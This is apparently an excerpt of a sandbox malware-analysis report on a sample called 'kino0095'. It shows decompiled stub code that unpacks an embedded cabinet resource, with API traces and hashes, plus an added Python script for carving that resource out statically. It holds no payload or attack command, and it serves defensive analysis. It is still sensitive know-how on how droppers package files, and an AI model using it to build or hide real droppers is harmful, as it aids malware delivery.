                                                                                                                                                                                                                                    0x010b5b20
                                                                                                                                                                                                                                    0x010b5b27
                                                                                                                                                                                                                                    0x010b5b52
                                                                                                                                                                                                                                    0x010b5b52
                                                                                                                                                                                                                                    0x010b5b5b
                                                                                                                                                                                                                                    0x010b5b62
                                                                                                                                                                                                                                    0x010b5b6b
                                                                                                                                                                                                                                    0x010b5b6d
                                                                                                                                                                                                                                    0x010b5b76
                                                                                                                                                                                                                                    0x010b5b7d
                                                                                                                                                                                                                                    0x010b5b83
                                                                                                                                                                                                                                    0x010b5b7f
                                                                                                                                                                                                                                    0x010b5b7f
                                                                                                                                                                                                                                    0x010b5b7f
                                                                                                                                                                                                                                    0x010b5b6f
                                                                                                                                                                                                                                    0x010b5b72
                                                                                                                                                                                                                                    0x010b5b72
                                                                                                                                                                                                                                    0x010b5b85
                                                                                                                                                                                                                                    0x010b5b98
                                                                                                                                                                                                                                    0x010b5b9e
                                                                                                                                                                                                                                    0x010b5b87
                                                                                                                                                                                                                                    0x010b5b8f
                                                                                                                                                                                                                                    0x010b5b8f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5b85
                                                                                                                                                                                                                                    0x010b5b29
                                                                                                                                                                                                                                    0x010b5b33
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5b35
                                                                                                                                                                                                                                    0x010b5b48
                                                                                                                                                                                                                                    0x010b5b4a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5b4a
                                                                                                                                                                                                                                    0x010b5b0f
                                                                                                                                                                                                                                    0x010b5b16
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5b16
                                                                                                                                                                                                                                    0x010b5a7c
                                                                                                                                                                                                                                    0x010b5a8a
                                                                                                                                                                                                                                    0x010b5aa5
                                                                                                                                                                                                                                    0x010b5aab
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b59bb
                                                                                                                                                                                                                                    0x010b59c0
                                                                                                                                                                                                                                    0x010b59c7
                                                                                                                                                                                                                                    0x010b59d1
                                                                                                                                                                                                                                    0x010b59d6
                                                                                                                                                                                                                                    0x010b5c05
                                                                                                                                                                                                                                    0x010b5c14
                                                                                                                                                                                                                                    0x010b5c14

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010B59A8
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 010B59AF
                                                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 010B5A13
• MulDiv.KERNEL32(?,?,00000400), ref: 010B5A40
• GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 010B5A64
• memset.MSVCRT ref: 010B5A7C
• GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010B5A98
• FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010B5AA5
• SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 010B5BFC
  • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
  • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
  • Part of subcall function 010B6285: GetLastError.KERNEL32(010B5BBC), ref: 010B6285
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
• String ID:
• API String ID: 4237285672-0
• Opcode ID: 052eb64b7e0d8d5b2eed76ffb28b13b3d19d484e6991d12b36050d13380a9611
• Instruction ID: d2635d612351b3b1182b4bc11f2132c377472e583908c42d086dcf644cd97f65
• Opcode Fuzzy Hash: 052eb64b7e0d8d5b2eed76ffb28b13b3d19d484e6991d12b36050d13380a9611
• Instruction Fuzzy Hash: 837191B1A0020CAFEB669B24CCC5FFA77ADEB48344F0444E9E585D7184EA359E858F64
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Executed
• Not Executed
control_flow_graph (text dump of the rendered graph; block ranges and edges): 374 10b4fe0-10b501a call 10b468f FindResourceA LoadResource LockResource 377 10b5161-10b5163 374->377 378 10b5020-10b5027 374->378 379 10b5029-10b5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 10b5057-10b505e call 10b4efd 378->380 379->380 383 10b507c-10b50b4 380->383 384 10b5060-10b5077 call 10b44b9 380->384 389 10b50e8-10b5104 call 10b44b9 383->389 390 10b50b6-10b50da 383->390 388 10b5107-10b510e 384->388 391 10b511d-10b511f 388->391 392 10b5110-10b5117 FreeResource 388->392 398 10b5106 389->398 390->398 402 10b50dc 390->402 394 10b513a-10b5141 391->394 395 10b5121-10b5127 391->395 392->391 400 10b515f 394->400 401 10b5143-10b514a 394->401 395->394 399 10b5129-10b5135 call 10b44b9 395->399 398->388 399->394 400->377 401->400 404 10b514c-10b5159 SendMessageA 401->404 405 10b50e3-10b50e6 402->405 404->400 405->389 405->398
C-Code - Quality: 77%
E010B4FE0(void* __edi, void* __eflags) {
	void* __ebx;
	void* _t8;
	struct HWND__* _t9;
	int _t10;
	void* _t12;
	struct HWND__* _t24;
	struct HWND__* _t27;
	intOrPtr _t29;
	void* _t33;
	int _t34;
	CHAR* _t36;
	int _t37;
	intOrPtr _t47;

	_t33 = __edi;
	_t36 = "CABINET";
	 *0x10b9144 = E010B468F(_t36, 0, 0);
	_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
	 *0x10b9140 = _t8;
	if(_t8 == 0) {
		return _t8;
	}
	_t9 =  *0x10b8584; // 0x0
	if(_t9 != 0) {
		ShowWindow(GetDlgItem(_t9, 0x842), 0);
		ShowWindow(GetDlgItem( *0x10b8584, 0x841), 5);
	}
	_t10 = E010B4EFD(0, 0);
	if(_t10 != 0) {
		__imp__#20(E010B4CA0, E010B4CC0, E010B4980, E010B4A50, E010B4AD0, E010B4B60, E010B4BC0, 1, 0x10b9148, _t33);
		_t34 = _t10;
		if(_t34 == 0) {
			L8:
			_t29 =  *0x10b9148; // 0x0
			_t24 =  *0x10b8584; // 0x0
			E010B44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
			_t37 = 0;
			L9:
			goto L10;
		}
		__imp__#22(_t34, "*MEMCAB", 0x10b1140, 0, E010B4CD0, 0, 0x10b9140); // executed
		_t37 = _t10;
		if(_t37 == 0) {
			goto L9;
		}
		__imp__#23(_t34); // executed
		if(_t10 != 0) {
			goto L9;
		}
		goto L8;
	} else {
		_t27 =  *0x10b8584; // 0x0
		E010B44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
		_t37 = 0;
		L10:
		_t12 =  *0x10b9140; // 0x0
		if(_t12 != 0) {
			FreeResource(_t12);
			 *0x10b9140 = 0;
		}
		if(_t37 == 0) {
			_t47 =  *0x10b91d8; // 0x0
			if(_t47 == 0) {
				E010B44B9(0, 0x4f8, 0, 0, 0x10, 0);
			}
		}
		if(( *0x10b8a38 & 0x00000001) == 0 && ( *0x10b9a34 & 0x00000001) == 0) {
			SendMessageA( *0x10b8584, 0xfa1, _t37, 0);
		}
		return _t37;
	}
}
Instruction addresses (side column of the listing above): 0x010b4fe0 0x010b4fe6 0x010b4ff9 0x010b500d 0x010b5013 0x010b501a 0x010b5163 0x010b5163 0x010b5020 0x010b5027 0x010b5037 0x010b5051 0x010b5051 0x010b5057 0x010b505e 0x010b50a7 0x010b50ad 0x010b50b4 0x010b50e8 0x010b50e8 0x010b50ee 0x010b50ff 0x010b5104 0x010b5106 0x00000000 0x010b5106 0x010b50cd 0x010b50d3 0x010b50da 0x00000000 0x00000000 0x010b50dd 0x010b50e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5060
                                                                                                                                                                                                                                    0x010b5060
                                                                                                                                                                                                                                    0x010b5070
                                                                                                                                                                                                                                    0x010b5075
                                                                                                                                                                                                                                    0x010b5107
                                                                                                                                                                                                                                    0x010b5107
                                                                                                                                                                                                                                    0x010b510e
                                                                                                                                                                                                                                    0x010b5111
                                                                                                                                                                                                                                    0x010b5117
                                                                                                                                                                                                                                    0x010b5117
                                                                                                                                                                                                                                    0x010b511f
                                                                                                                                                                                                                                    0x010b5121
                                                                                                                                                                                                                                    0x010b5127
                                                                                                                                                                                                                                    0x010b5135
                                                                                                                                                                                                                                    0x010b5135
                                                                                                                                                                                                                                    0x010b5127
                                                                                                                                                                                                                                    0x010b5141
                                                                                                                                                                                                                                    0x010b5159
                                                                                                                                                                                                                                    0x010b5159
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b515f

APIs
  • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46A0
  • Part of subcall function 010B468F: SizeofResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46A9
  • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46C3
  • Part of subcall function 010B468F: LoadResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46CC
  • Part of subcall function 010B468F: LockResource.KERNEL32(00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46D3
  • Part of subcall function 010B468F: memcpy_s.MSVCRT ref: 010B46E5
  • Part of subcall function 010B468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46EF
• FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 010B4FFE
• LoadResource.KERNEL32(00000000,00000000), ref: 010B5006
• LockResource.KERNEL32(00000000), ref: 010B500D
• GetDlgItem.USER32(00000000,00000842), ref: 010B5030
• ShowWindow.USER32(00000000), ref: 010B5037
• GetDlgItem.USER32(00000841,00000005), ref: 010B504A
• ShowWindow.USER32(00000000), ref: 010B5051
• FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 010B5111
• SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 010B5159
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
• String ID: *MEMCAB$CABINET
• API String ID: 1305606123-2642027498
• Opcode ID: ce9393eb8e04bc4996a380d629d9c9ef10575649f98229ac929c01676fe9e073
• Instruction ID: 884086d7e2e923cb8445e97067201b02979e1047780578f741bab10130957e32
• Opcode Fuzzy Hash: ce9393eb8e04bc4996a380d629d9c9ef10575649f98229ac929c01676fe9e073
• Instruction Fuzzy Hash: 6031FCB0740305BBE7705B66ACC9FE7369CE704745F044859FAC2E634AD67E9C408B60
Uniqueness

Uniqueness Score: -1.00%
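The traced sequence FindResourceA(NULL, "CABINET", 0x0A) then LoadResource then LockResource, together with the TITLE resource and the *MEMCAB string, is the resource layout of the Windows IExpress/wextract self-extracting stub: the payload is a Microsoft Cabinet stored as an RCDATA (type 10) resource named CABINET and handed to the FDI cabinet API from memory. The same resource can be carved out of the file statically, which yields the cabinet holding the dropped files without executing the sample. The following Python is an added example, not code from this report or from the sample; the function names are the editor's, and build_rsrc produces a constructed .rsrc image that exists only to exercise the directory walker.

```python
"""Statically pull an RCDATA resource (here "CABINET") out of a PE's .rsrc
section, standard library only.  Added example; not code from the report or
from the analysed sample.  Mirrors the traced FindResourceA(NULL, "CABINET",
RT_RCDATA) -> LoadResource -> LockResource sequence, but on disk."""
import struct

RT_RCDATA = 10          # the 0x0A passed to FindResourceA in the API trace
HIGH_BIT = 0x80000000   # name-is-string / entry-is-subdirectory flag


def _entries(rsrc, dir_off):
    """Yield (name_or_id, target_offset, is_subdir) for one resource directory."""
    n_named, n_id = struct.unpack_from("<HH", rsrc, dir_off + 12)
    pos = dir_off + 16
    for _ in range(n_named + n_id):
        name, off = struct.unpack_from("<II", rsrc, pos)
        pos += 8
        if name & HIGH_BIT:                       # IMAGE_RESOURCE_DIR_STRING_U
            s = name & ~HIGH_BIT
            (length,) = struct.unpack_from("<H", rsrc, s)   # length in WCHARs
            name = rsrc[s + 2:s + 2 + 2 * length].decode("utf-16-le")
        yield name, off & ~HIGH_BIT, bool(off & HIGH_BIT)


def find_resource(rsrc, rsrc_rva, type_id, name):
    """Return the bytes of resource `name` of type `type_id`, or None.

    Directory offsets are relative to the start of .rsrc; the data entry's
    pointer is an RVA, so rsrc_rva (the section's VirtualAddress) is needed.
    """
    for tname, toff, tsub in _entries(rsrc, 0):
        if not tsub or tname != type_id:
            continue
        for rname, roff, rsub in _entries(rsrc, toff):
            if not rsub or str(rname).upper() != str(name).upper():
                continue                          # resource names are case-insensitive
            for _lang, doff, dsub in _entries(rsrc, roff):
                if not dsub:                      # first language: the data entry
                    data_rva, size = struct.unpack_from("<II", rsrc, doff)
                    start = data_rva - rsrc_rva
                    return bytes(rsrc[start:start + size])
    return None


def rsrc_section(pe):
    """Return (raw .rsrc bytes, VirtualAddress) from a PE image read from disk."""
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    (n_sections,) = struct.unpack_from("<H", pe, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", pe, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size              # section table follows the optional header
    for i in range(n_sections):
        name, _vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        if name.rstrip(b"\0") == b".rsrc":
            return pe[raw_ptr:raw_ptr + raw_size], va
    raise ValueError("no .rsrc section")


def extract_cabinet(pe_path):
    """Dump the CABINET resource; refuse anything that is not a Microsoft Cabinet."""
    with open(pe_path, "rb") as fh:
        rsrc, va = rsrc_section(fh.read())
    cab = find_resource(rsrc, va, RT_RCDATA, "CABINET")
    if cab is not None and cab[:4] != b"MSCF":   # CAB magic; wextract hands this blob to FDI
        raise ValueError("CABINET resource is not a cabinet file")
    return cab


def build_rsrc(resources, rsrc_rva):
    """Constructed .rsrc image (test fixture, not taken from the sample): one
    RT_RCDATA type directory holding the given {name: payload} resources."""
    names = sorted(resources, key=str.upper)      # named entries are stored sorted
    n, type_off = len(names), 24
    cur = type_off + 16 + 8 * n
    str_off = {}
    for nm in names:
        str_off[nm], cur = cur, cur + 2 + 2 * len(nm)
    cur = (cur + 3) & ~3                          # keep directories 4-byte aligned
    dir_off = {nm: cur + 24 * i for i, nm in enumerate(names)}
    dat_off = {nm: cur + 24 * n + 16 * i for i, nm in enumerate(names)}
    buf = bytearray(cur + 40 * n)
    struct.pack_into("<IIHHHH", buf, 0, 0, 0, 0, 0, 0, 1)               # root: one ID entry
    struct.pack_into("<II", buf, 16, RT_RCDATA, HIGH_BIT | type_off)
    struct.pack_into("<IIHHHH", buf, type_off, 0, 0, 0, 0, n, 0)        # type dir: n named entries
    for i, nm in enumerate(names):
        struct.pack_into("<II", buf, type_off + 16 + 8 * i, HIGH_BIT | str_off[nm], HIGH_BIT | dir_off[nm])
        struct.pack_into("<H", buf, str_off[nm], len(nm))
        buf[str_off[nm] + 2:str_off[nm] + 2 + 2 * len(nm)] = nm.encode("utf-16-le")
        struct.pack_into("<IIHHHH", buf, dir_off[nm], 0, 0, 0, 0, 0, 1)  # lang dir: one ID entry
        struct.pack_into("<II", buf, dir_off[nm] + 16, 0x409, dat_off[nm])
        struct.pack_into("<IIII", buf, dat_off[nm], rsrc_rva + len(buf), len(resources[nm]), 0, 0)
        buf += resources[nm]                      # payload appended after all directories
    return bytes(buf)


if __name__ == "__main__":
    import sys
    cab = extract_cabinet(sys.argv[1])
    print("no CABINET resource" if cab is None else f"CABINET: {len(cab)} bytes, magic {cab[:4]!r}")
```

Running the script on the sample writes nothing to disk; extend extract_cabinet to save the returned bytes and unpack them with a cabinet tool (for example 7-Zip or cabextract) to obtain the dropped components offline. The MSCF check matters because IExpress-style stubs are also used with non-cabinet payloads, and a wrong resource type would otherwise be misread as a cabinet.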

Control-flow Graph

Rendered graph for the function at 10b44b9 (basic blocks 406 to 448, coloured executed / not executed in the original; the edge list is not reproduced). Blocks that call APIs: 10b44fe LoadStringA, 10b4544 MessageBoxA, 10b4596 LocalAlloc, 10b45d9 LocalAlloc, 10b4607 LocalAlloc, 10b462d MessageBeep, 10b4653 MessageBoxA and LocalFree; internal calls go to 10b1680, 10b171e, 10b67c9, 10b681f and 10b6ce0.
C-Code - Quality: 94%
			E010B44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x10b8004; // 0x72151d89
				_v8 = _t34 ^ _t89; // MSVC /GS prologue: __security_cookie XOR ebp, stored as the stack canary
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource."; // fallback text if the string resource cannot be loaded
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2); // 13 dwords (52 bytes) of the message copied onto the stack
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb"); // the terminating NUL byte of the 53-byte string
				if(( *0x10b8a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x10b9a3c, _t75,  &_v576, 0x200); // hInstance, string ID passed in edx, 0x200-byte stack buffer
					if(_v576 != 0) {
						_t73 =  &_v576;
                                                                                                                                                                                                                                    						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                    						_t75 = _t16;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t43 =  *_t73;
                                                                                                                                                                                                                                    							_t73 = _t73 + 1;
                                                                                                                                                                                                                                    						} while (_t43 != 0);
                                                                                                                                                                                                                                    						_t84 = _v580;
                                                                                                                                                                                                                                    						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                    						if(_t84 == 0) {
                                                                                                                                                                                                                                    							if(_t67 == 0) {
                                                                                                                                                                                                                                    								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                    								_t83 = _t27;
                                                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t75 = _t83;
                                                                                                                                                                                                                                    									_t74 = _t80;
                                                                                                                                                                                                                                    									E010B1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t76 = _t67;
                                                                                                                                                                                                                                    								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                    								_t85 = _t24;
                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                    									_t55 =  *_t76;
                                                                                                                                                                                                                                    									_t76 = _t76 + 1;
                                                                                                                                                                                                                                    								} while (_t55 != 0);
                                                                                                                                                                                                                                    								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                    								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									E010B171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t77 = _t67;
                                                                                                                                                                                                                                    							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                    							_t81 = _t18;
                                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                                    								_t58 =  *_t77;
                                                                                                                                                                                                                                    								_t77 = _t77 + 1;
                                                                                                                                                                                                                                    							} while (_t58 != 0);
                                                                                                                                                                                                                                    							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                    							_t82 = _t84 + 1;
                                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                                    								_t59 =  *_t84;
                                                                                                                                                                                                                                    								_t84 = _t84 + 1;
                                                                                                                                                                                                                                    							} while (_t59 != 0);
                                                                                                                                                                                                                                    							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                    							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                    							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                    							_t80 = _t44;
                                                                                                                                                                                                                                    							if(_t80 == 0) {
                                                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_push(_v580);
                                                                                                                                                                                                                                    								E010B171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                    								L23:
                                                                                                                                                                                                                                    								MessageBeep(_a12);
                                                                                                                                                                                                                                    								if(E010B681F(_t67) == 0) {
                                                                                                                                                                                                                                    									L25:
                                                                                                                                                                                                                                    									_t49 = 0x10000;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t54 = E010B67C9(_t74, _t74);
                                                                                                                                                                                                                                    									_t49 = 0x190000;
                                                                                                                                                                                                                                    									if(_t54 == 0) {
                                                                                                                                                                                                                                    										goto L25;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t52 = MessageBoxA(_v584, _t80, "doza2", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                                                    								_t83 = _t52;
                                                                                                                                                                                                                                    								LocalFree(_t80);
                                                                                                                                                                                                                                    								_t39 = _t52;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(E010B681F(_t67) == 0) {
                                                                                                                                                                                                                                    							L4:
                                                                                                                                                                                                                                    							_t64 = 0x10010;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t66 = E010B67C9(0, 0);
                                                                                                                                                                                                                                    							_t64 = 0x190010;
                                                                                                                                                                                                                                    							if(_t66 == 0) {
                                                                                                                                                                                                                                    								goto L4;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t44 = MessageBoxA(_v584,  &_v64, "doza2", _t64);
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E010B6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                    			}

0x010b44b9
0x010b44c4
0x010b44cb
0x010b44d8
0x010b44e4
0x010b44eb
0x010b44ee
0x010b44ef
0x010b44ef
0x010b44f1
0x010b44f7
0x010b44f8
0x010b467b
0x010b44fe
0x010b4509
0x010b4518
0x010b4525
0x010b4562
0x010b4568
0x010b4568
0x010b456b
0x010b456b
0x010b456d
0x010b456e
0x010b4572
0x010b4578
0x010b457c
0x010b45cb
0x010b4607
                                                                                                                                                                                                                                    0x010b4607
                                                                                                                                                                                                                                    0x010b460d
                                                                                                                                                                                                                                    0x010b4613
                                                                                                                                                                                                                                    0x010b4617
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b461d
                                                                                                                                                                                                                                    0x010b4623
                                                                                                                                                                                                                                    0x010b4626
                                                                                                                                                                                                                                    0x010b4628
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4628
                                                                                                                                                                                                                                    0x010b45cd
                                                                                                                                                                                                                                    0x010b45cd
                                                                                                                                                                                                                                    0x010b45cf
                                                                                                                                                                                                                                    0x010b45cf
                                                                                                                                                                                                                                    0x010b45d2
                                                                                                                                                                                                                                    0x010b45d2
                                                                                                                                                                                                                                    0x010b45d4
                                                                                                                                                                                                                                    0x010b45d5
                                                                                                                                                                                                                                    0x010b45db
                                                                                                                                                                                                                                    0x010b45de
                                                                                                                                                                                                                                    0x010b45e3
                                                                                                                                                                                                                                    0x010b45e9
                                                                                                                                                                                                                                    0x010b45ed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b45f3
                                                                                                                                                                                                                                    0x010b45fd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4602
                                                                                                                                                                                                                                    0x010b45ed
                                                                                                                                                                                                                                    0x010b457e
                                                                                                                                                                                                                                    0x010b457e
                                                                                                                                                                                                                                    0x010b4580
                                                                                                                                                                                                                                    0x010b4580
                                                                                                                                                                                                                                    0x010b4583
                                                                                                                                                                                                                                    0x010b4583
                                                                                                                                                                                                                                    0x010b4585
                                                                                                                                                                                                                                    0x010b4586
                                                                                                                                                                                                                                    0x010b458a
                                                                                                                                                                                                                                    0x010b458c
                                                                                                                                                                                                                                    0x010b458f
                                                                                                                                                                                                                                    0x010b458f
                                                                                                                                                                                                                                    0x010b4591
                                                                                                                                                                                                                                    0x010b4592
                                                                                                                                                                                                                                    0x010b459b
                                                                                                                                                                                                                                    0x010b459e
                                                                                                                                                                                                                                    0x010b45a3
                                                                                                                                                                                                                                    0x010b45a9
                                                                                                                                                                                                                                    0x010b45ad
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b45af
                                                                                                                                                                                                                                    0x010b45af
                                                                                                                                                                                                                                    0x010b45bf
                                                                                                                                                                                                                                    0x010b462d
                                                                                                                                                                                                                                    0x010b4630
                                                                                                                                                                                                                                    0x010b463d
                                                                                                                                                                                                                                    0x010b464e
                                                                                                                                                                                                                                    0x010b464e
                                                                                                                                                                                                                                    0x010b463f
                                                                                                                                                                                                                                    0x010b4640
                                                                                                                                                                                                                                    0x010b4647
                                                                                                                                                                                                                                    0x010b464c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b464c
                                                                                                                                                                                                                                    0x010b4666
                                                                                                                                                                                                                                    0x010b466d
                                                                                                                                                                                                                                    0x010b466f
                                                                                                                                                                                                                                    0x010b4675
                                                                                                                                                                                                                                    0x010b4675
                                                                                                                                                                                                                                    0x010b45ad
                                                                                                                                                                                                                                    0x010b4527
                                                                                                                                                                                                                                    0x010b452e
                                                                                                                                                                                                                                    0x010b453f
                                                                                                                                                                                                                                    0x010b453f
                                                                                                                                                                                                                                    0x010b4530
                                                                                                                                                                                                                                    0x010b4531
                                                                                                                                                                                                                                    0x010b4538
                                                                                                                                                                                                                                    0x010b453d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b453d
                                                                                                                                                                                                                                    0x010b4554
                                                                                                                                                                                                                                    0x010b455a
                                                                                                                                                                                                                                    0x010b455a
                                                                                                                                                                                                                                    0x010b455a
                                                                                                                                                                                                                                    0x010b4525
                                                                                                                                                                                                                                    0x010b468c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
                                                                                                                                                                                                                                    • MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 010B45A3
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 010B45E3
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000002), ref: 010B460D
